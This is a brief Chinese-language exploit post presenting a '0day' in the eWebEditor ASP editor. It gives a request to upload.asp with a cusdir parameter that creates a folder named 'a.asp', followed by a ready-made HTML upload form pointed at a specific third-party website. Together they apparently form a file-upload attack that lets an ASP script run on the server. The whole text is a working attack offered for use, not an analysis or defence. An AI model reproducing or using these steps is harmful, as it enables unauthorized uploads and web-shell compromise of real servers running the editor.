ewebeditor通杀鸡肋0day漏洞


    先访问这个地址
     Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
     访问这个地址可以建立个A.ASP的文件夹……
     再用这个html代码上传。
    
    <form action="http://www.zzfhw.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
     <input type=file name=uploadfile size=100><br><br>
     <input type=submit value=upload>
     </form>